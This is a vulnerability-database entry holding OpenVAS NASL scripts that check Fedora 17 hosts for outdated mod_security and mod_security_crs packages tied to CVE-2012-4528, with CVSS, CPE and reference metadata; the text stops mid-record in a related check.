Fedora Update for mod_security_crs FEDORA-2012-18315
2012-12-04T00:00:00
ID OPENVAS:864904 Type openvas Reporter Copyright (c) 2012 Greenbone Networks GmbH Modified 2017-12-29T00:00:00
Description
Check for the Version of mod_security_crs
###############################################################################
# OpenVAS Vulnerability Test
#
# Fedora Update for mod_security_crs FEDORA-2012-18315
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
include("revisions-lib.inc");
tag_affected = "mod_security_crs on Fedora 17";
tag_insight = "This package provides the base rules for mod_security.";
tag_solution = "Please Install the Updated Packages.";
if(description)
{
script_xref(name : "URL" , value : "http://lists.fedoraproject.org/pipermail/package-announce/2012-December/093620.html");
script_id(864904);
script_version("$Revision: 8257 $");
script_tag(name:"last_modification", value:"$Date: 2017-12-29 07:29:46 +0100 (Fri, 29 Dec 2017) $");
script_tag(name:"creation_date", value:"2012-12-04 09:40:19 +0530 (Tue, 04 Dec 2012)");
script_cve_id("CVE-2012-4528");
script_tag(name:"cvss_base", value:"5.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:P/A:N");
script_xref(name: "FEDORA", value: "2012-18315");
script_name("Fedora Update for mod_security_crs FEDORA-2012-18315");
script_tag(name: "summary" , value: "Check for the Version of mod_security_crs");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
script_family("Fedora Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/fedora", "ssh/login/rpms");
script_tag(name : "affected" , value : tag_affected);
script_tag(name : "insight" , value : tag_insight);
script_tag(name : "solution" , value : tag_solution);
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("pkg-lib-rpm.inc");
release = get_kb_item("ssh/login/release");
res = "";
if(release == NULL){
exit(0);
}
if(release == "FC17")
{
if ((res = isrpmvuln(pkg:"mod_security_crs", rpm:"mod_security_crs~2.2.6~3.fc17", rls:"FC17")) != NULL)
{
security_message(data:res);
exit(0);
}
if (__pkg_match) exit(99); # Not vulnerable.
exit(0);
}
{"id": "OPENVAS:864904", "type": "openvas", "bulletinFamily": "scanner", "title": "Fedora Update for mod_security_crs FEDORA-2012-18315", "description": "Check for the Version of mod_security_crs", "published": "2012-12-04T00:00:00", "modified": "2017-12-29T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=864904", "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "references": ["http://lists.fedoraproject.org/pipermail/package-announce/2012-December/093620.html", "2012-18315"], "cvelist": ["CVE-2012-4528"], "lastseen": "2018-01-02T10:58:01", "viewCount": 1, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2018-01-02T10:58:01", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-4528"]}, {"type": "exploitdb", "idList": ["EDB-ID:37949"]}, {"type": "nessus", "idList": ["FEDORA_2012-18315.NASL", "OPENSUSE-2013-640.NASL", "FEDORA_2012-18278.NASL", "MANDRIVA_MDVSA-2013-029.NASL", "OPENSUSE-2013-641.NASL", "MODSECURITY_2_7_0.NASL", "MANDRIVA_MDVSA-2012-182.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:831759", "OPENVAS:865688", "OPENVAS:1361412562310831759", "OPENVAS:864903", "OPENVAS:1361412562310864903", "OPENVAS:1361412562310865552", "OPENVAS:1361412562310865688", "OPENVAS:1361412562310864904", "OPENVAS:865552"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12451"]}], "modified": "2018-01-02T10:58:01", "rev": 2}, "vulnersScore": 6.2}, "pluginID": "864904", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mod_security_crs FEDORA-2012-18315\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"mod_security_crs on Fedora 17\";\ntag_insight = \"This package provides the base rules for mod_security.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-December/093620.html\");\n script_id(864904);\n script_version(\"$Revision: 8257 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-29 07:29:46 +0100 (Fri, 29 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-12-04 09:40:19 +0530 (Tue, 04 Dec 2012)\");\n script_cve_id(\"CVE-2012-4528\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"FEDORA\", value: \"2012-18315\");\n script_name(\"Fedora Update for mod_security_crs FEDORA-2012-18315\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mod_security_crs\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"mod_security_crs\", rpm:\"mod_security_crs~2.2.6~3.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "naslFamily": "Fedora Local Security Checks"}
{"cve": [{"lastseen": "2020-12-09T19:47:24", "description": "The mod_security2 module before 2.7.0 for the Apache HTTP Server allows remote attackers to bypass rules, and deliver arbitrary POST data to a PHP application, via a multipart request in which an invalid part precedes the crafted data.", "edition": 5, "cvss3": {}, "published": "2012-12-28T11:48:00", "title": "CVE-2012-4528", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4528"], "modified": "2013-11-25T04:28:00", "cpe": ["cpe:/a:modsecurity:modsecurity:2.6.1", "cpe:/a:modsecurity:modsecurity:2.1.3", "cpe:/a:modsecurity:modsecurity:2.7.0", "cpe:/a:modsecurity:modsecurity:2.1.5", "cpe:/a:modsecurity:modsecurity:2.5.7", "cpe:/a:modsecurity:modsecurity:2.1.2", "cpe:/a:modsecurity:modsecurity:2.0.1", "cpe:/a:modsecurity:modsecurity:2.5.10", "cpe:/a:modsecurity:modsecurity:2.5.13", "cpe:/a:modsecurity:modsecurity:2.6.8", "cpe:/a:modsecurity:modsecurity:2.0.0", "cpe:/a:modsecurity:modsecurity:2.5.6", "cpe:/a:modsecurity:modsecurity:2.6.4", "cpe:/a:modsecurity:modsecurity:2.5.5", "cpe:/a:modsecurity:modsecurity:2.5.11", "cpe:/a:modsecurity:modsecurity:2.1.0", "cpe:/a:modsecurity:modsecurity:2.6.7", "cpe:/a:modsecurity:modsecurity:2.5.12", "cpe:/a:modsecurity:modsecurity:2.1.6", "cpe:/a:modsecurity:modsecurity:2.6.3", "cpe:/a:modsecurity:modsecurity:2.5.4", "cpe:/a:modsecurity:modsecurity:2.1.1", "cpe:/a:modsecurity:modsecurity:2.5.1", "cpe:/a:modsecurity:modsecurity:2.0.3", "cpe:/a:modsecurity:modsecurity:2.6.0", "cpe:/a:modsecurity:modsecurity:2.6.2", "cpe:/a:modsecurity:modsecurity:2.0.2", "cpe:/a:modsecurity:modsecurity:2.1.4", "cpe:/a:modsecurity:modsecurity:2.5.9", "cpe:/a:modsecurity:modsecurity:2.5.8", "cpe:/a:modsecurity:modsecurity:2.5.3", "cpe:/a:modsecurity:modsecurity:2.5.2", "cpe:/a:modsecurity:modsecurity:2.0.4", "cpe:/a:modsecurity:modsecurity:2.6.5", "cpe:/a:modsecurity:modsecurity:2.5.0"], "id": "CVE-2012-4528", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4528", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:modsecurity:modsecurity:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.6.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.5.12:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.6.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.5.11:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.6.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.6.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.5.13:dev1:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.7.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.6.0:rc1:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2018-01-11T11:07:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-4528"], "description": "Check for the Version of mod_security", "modified": "2018-01-09T00:00:00", "published": "2012-12-04T00:00:00", "id": "OPENVAS:864903", "href": "http://plugins.openvas.org/nasl.php?oid=864903", "type": "openvas", "title": "Fedora Update for mod_security FEDORA-2012-18315", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mod_security FEDORA-2012-18315\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"mod_security on Fedora 17\";\ntag_insight = \"ModSecurity is an open source intrusion detection and prevention engine\n for web applications. It operates embedded into the web server, acting\n as a powerful umbrella - shielding web applications from attacks.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-December/093619.html\");\n script_id(864903);\n script_version(\"$Revision: 8336 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-09 08:01:48 +0100 (Tue, 09 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-12-04 09:40:17 +0530 (Tue, 04 Dec 2012)\");\n script_cve_id(\"CVE-2012-4528\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"FEDORA\", value: \"2012-18315\");\n script_name(\"Fedora Update for mod_security FEDORA-2012-18315\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mod_security\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"mod_security\", rpm:\"mod_security~2.7.1~3.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-05-29T18:39:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-4528"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-12-04T00:00:00", "id": "OPENVAS:1361412562310864904", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864904", "type": "openvas", "title": "Fedora Update for mod_security_crs FEDORA-2012-18315", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mod_security_crs FEDORA-2012-18315\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-December/093620.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864904\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-12-04 09:40:19 +0530 (Tue, 04 Dec 2012)\");\n script_cve_id(\"CVE-2012-4528\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name:\"FEDORA\", value:\"2012-18315\");\n script_name(\"Fedora Update for mod_security_crs FEDORA-2012-18315\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mod_security_crs'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"mod_security_crs on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"mod_security_crs\", rpm:\"mod_security_crs~2.2.6~3.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:38:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-4528"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-12-04T00:00:00", "id": "OPENVAS:1361412562310864903", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864903", "type": "openvas", "title": "Fedora Update for mod_security FEDORA-2012-18315", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mod_security FEDORA-2012-18315\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-December/093619.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864903\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-12-04 09:40:17 +0530 (Tue, 04 Dec 2012)\");\n script_cve_id(\"CVE-2012-4528\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name:\"FEDORA\", value:\"2012-18315\");\n script_name(\"Fedora Update for mod_security FEDORA-2012-18315\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mod_security'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"mod_security on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"mod_security\", rpm:\"mod_security~2.7.1~3.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-07-25T10:52:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-4528", "CVE-2013-1915"], "description": "Check for the Version of mod_security", "modified": "2017-07-10T00:00:00", "published": "2013-04-15T00:00:00", "id": "OPENVAS:865552", "href": "http://plugins.openvas.org/nasl.php?oid=865552", "type": "openvas", "title": "Fedora Update for mod_security FEDORA-2013-4834", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mod_security FEDORA-2013-4834\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"mod_security on Fedora 17\";\ntag_insight = \"ModSecurity is an open source intrusion detection and prevention engine\n for web applications. It operates embedded into the web server, acting\n as a powerful umbrella - shielding web applications from attacks.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(865552);\n script_version(\"$Revision: 6628 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:32:47 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-04-15 10:09:14 +0530 (Mon, 15 Apr 2013)\");\n script_cve_id(\"CVE-2012-4528\", \"CVE-2013-1915\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mod_security FEDORA-2013-4834\");\n\n script_xref(name: \"FEDORA\", value: \"2013-4834\");\n script_xref(name: \"URL\" , value: \"http://lists.fedoraproject.org/pipermail/package-announce/2013-April/101898.html\");\n script_summary(\"Check for the Version of mod_security\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"mod_security\", rpm:\"mod_security~2.7.3~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-23T13:09:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-4528", "CVE-2013-2765"], "description": "Check for the Version of mod_security", "modified": "2018-01-23T00:00:00", "published": "2013-06-07T00:00:00", "id": "OPENVAS:865688", "href": "http://plugins.openvas.org/nasl.php?oid=865688", "type": "openvas", "title": "Fedora Update for mod_security FEDORA-2013-9518", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mod_security FEDORA-2013-9518\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"mod_security on Fedora 17\";\ntag_insight = \"ModSecurity is an open source intrusion detection and prevention engine\n for web applications. It operates embedded into the web server, acting\n as a powerful umbrella - shielding web applications from attacks.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(865688);\n script_version(\"$Revision: 8494 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-23 07:57:55 +0100 (Tue, 23 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-06-07 10:02:43 +0530 (Fri, 07 Jun 2013)\");\n script_cve_id(\"CVE-2013-2765\", \"CVE-2012-4528\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_name(\"Fedora Update for mod_security FEDORA-2013-9518\");\n\n script_xref(name: \"FEDORA\", value: \"2013-9518\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-June/107810.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of mod_security\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n 